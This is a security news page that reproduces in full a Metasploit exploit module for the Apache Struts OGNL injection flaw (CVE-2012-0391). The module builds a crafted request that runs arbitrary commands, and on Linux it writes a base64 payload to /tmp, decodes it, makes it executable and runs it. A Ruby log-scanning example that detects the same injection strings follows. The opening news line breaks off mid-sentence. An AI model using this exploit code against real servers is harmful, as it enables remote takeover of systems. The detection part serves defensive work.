Apache Struts 2.2.1.1 Remote Command Execution Vulnerability

Author: 龙虎鹰师网安 Apache Tutorial Network  Source: 龙虎鹰师网安 Apache Tutorial Network

Keywords: Apache
龙虎鹰师网安 news: Latest Apache Struts vulnerability published: Apache Struts 2.2.1.1 remote command execution vulnerability (Apache Struts

################################################################

# This file is part of the Metasploit Framework and may be subject to 

# redistribution and commercial restrictions. Please see the Metasploit 

# web site for more information on licensing and terms of use. 

#  http://metasploit.com/ 

################################################################ 

  
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote 

    Rank = ExcellentRanking 

  

    include Msf::Exploit::CmdStagerTFTP 

    include Msf::Exploit::Remote::HttpClient 

  

    def initialize(info = {}) 

        super(update_info(info, 

            'Name'           => 'Apache Struts <= 2.2.1.1 Remote Command Execution', 

            'Description'    => %q{ 

                    This module exploits a remote command execution vulnerability in

                Apache Struts versions < 2.2.1.1. This issue is caused because the 

                ExceptionDelegator interprets parameter values as OGNL expressions 

                during certain exception handling for mismatched data types of properties, 

                which allows remote attackers to execute arbitrary Java code via a 

                crafted parameter. 

            }, 

            'Author'         => 

                [ 

                    'Johannes Dahse', # Vulnerability discovery and PoC 

                    'Andreas Nusser', # Vulnerability discovery and PoC 

                    'juan vazquez', # Metasploit module 

                    'sinn3r' # Metasploit module 

                ], 

            'License'        => MSF_LICENSE, 

            'Version'        => '$Revision: $', 

            'References'     => 

                [ 

                    [ 'CVE', '2012-0391'], 

                    [ 'OSVDB', '78277'], 

                    [ 'EDB', '18329'], 

                    [ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt'] 

                ], 

            'Platform'      => [ 'win', 'linux'], 

            'Privileged'     => true, 

            'Targets'        => 

                [ 

                    ['Windows Universal', 

                        { 

                                'Arch' => ARCH_X86, 

                                'Platform' => 'win'

                        } 

                    ], 

                    ['Linux Universal', 

                        { 

                                'Arch' => ARCH_X86, 

                                'Platform' => 'linux'

                        } 

                    ], 

                ], 

            'DisclosureDate' => 'Jan 06 2012', 

            'DefaultTarget' => 0)) 

  

            register_options( 

                [ 

                    Opt::RPORT(8080), 

                    OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]), 

                    OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ]) 

                ], self.class) 

    end

   def execute_command(cmd, opts = {}) 

  

        uri = String.new(datastore['TARGETURI']) 

        uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'

        uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'

        uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) 

  

        vprint_status("Attempting to execute: #{cmd}") 

  

        resp = send_request_raw({ 

            'uri'     => uri, 

            'version' => '1.1', 

            'method'  => 'GET', 

        }, 5) 

   end

   def windows_stager 

        exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

  

        print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") 

        execute_cmdstager({ :temp => '.'}) 

        @payload_exe = payload_exe 

  

        print_status("Attempting to execute the payload...") 

        execute_command(@payload_exe) 

    end

   def linux_stager 

        cmds = "/bin/sh@-c@echo LINE | tee FILE"

        exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) 

        base64 = Rex::Text.encode_base64(exe) 

        base64.gsub!(/\=/, "\\u003d") 

        file = rand_text_alphanumeric(4+rand(4)) 

  

        execute_command("/bin/sh@-c@touch /tmp/#{file}.b64") 

        cmds.gsub!(/FILE/, "/tmp/" + file + ".b64") 

        base64.each_line do |line| 

            line.chomp! 

            cmd = cmds 

            cmd.gsub!(/LINE/, line) 

            execute_command(cmds) 

        end

  

        execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}") 

        execute_command("/bin/sh@-c@chmod +x /tmp/#{file}") 

        execute_command("/bin/sh@-c@rm /tmp/#{file}.b64") 

  

        execute_command("/bin/sh@-c@/tmp/#{file}") 

        @payload_exe = "/tmp/" + file 

    end

   def on_new_session(client) 

        if target['Platform'] == 'linux'

            print_status("Deleting #{@payload_exe} payload file") 

            execute_command("/bin/sh@-c@rm #{@payload_exe}") 

        else

            print_status("Windows does not allow running executables to be deleted") 

            print_status("Delete the #{@payload_exe} file manually after migrating") 

        end

    end

   def exploit 

        if not datastore['CMD'].empty? 

            print_status("Executing user supplied command") 

            execute_command(datastore['CMD']) 

            return

        end

  

        case target['Platform'] 

            when 'linux'

                linux_stager 

            when 'win'

                windows_stager 

            else

                raise RuntimeError, 'Unsupported target platform!'

        end

  

        handler 

    end

end
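
The request built in execute_command above carries the OGNL fragment #_memberAccess["allowStaticMethodAccess"]=true followed by a java.lang.Runtime call inside a percent-encoded query parameter, so it leaves a recognisable trace in web server access logs. The Ruby below is an added detection example, not part of the Metasploit module or the original page; it assumes combined-format access logs, and the function names, addresses and log lines are constructed for illustration.

```ruby
# Added example: flag the OGNL-injection indicators this module's request carries.
# The log lines below are constructed samples, not captured traffic.

OGNL_INDICATORS = {
  member_access:  /\#_memberAccess/i,
  static_methods: /allowStaticMethodAccess/i,
  runtime_exec:   /@java\.lang\.Runtime@getRuntime\(\)\s*\.\s*exec/i
}.freeze

# Percent-decode repeatedly so double-encoded payloads (%2523 -> %23 -> #) are seen.
def deep_decode(text, max_rounds = 3)
  current = text.b
  max_rounds.times do
    decoded = current.gsub(/%(\h\h)/) { Regexp.last_match(1).hex.chr }
    break if decoded == current
    current = decoded
  end
  current
end

# Names of the indicators present in one request target (path plus query string).
def ognl_indicators(target)
  decoded = deep_decode(target)
  OGNL_INDICATORS.select { |_name, pattern| decoded.match?(pattern) }.keys
end

# Scan combined-format log lines; return one finding per suspicious request.
def scan_access_log(lines)
  lines.each_with_object([]) do |line, findings|
    m = line.match(/\A(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/)
    next unless m
    hits = ognl_indicators(m[2])
    findings << { client: m[1], target: m[2], indicators: hits } unless hits.empty?
  end
end

SAMPLE_LOG = <<~'LOG'.lines
  198.51.100.7 - - [12/Sep/2012:00:10:01 +0000] "GET /HelloWorldStruts2/hello?name=test&id=5 HTTP/1.1" 200 512
  203.0.113.9 - - [12/Sep/2012:00:10:05 +0000] "GET /HelloWorldStruts2/hello?name=test&id='%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec(%22CMD%22))%2b' HTTP/1.1" 200 512
  203.0.113.9 - - [12/Sep/2012:00:10:09 +0000] "GET /HelloWorldStruts2/hello?name=test&id=%2527%252b(%2523_memberAccess[%2522allowStaticMethodAccess%2522]=true)%252b%2527 HTTP/1.1" 200 512
LOG

scan_access_log(SAMPLE_LOG).each do |f|
  puts "#{f[:client]} #{f[:indicators].join(',')} #{f[:target]}"
end
```

The same three patterns can be used as a starting point for a WAF or reverse-proxy rule; matching on the decoded value rather than the raw query string is what catches the double-encoded variant.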

Link to this article: http://www.rongsen.com.cn/show-17260-1.html
Updated: 2012-09-12 00:12:48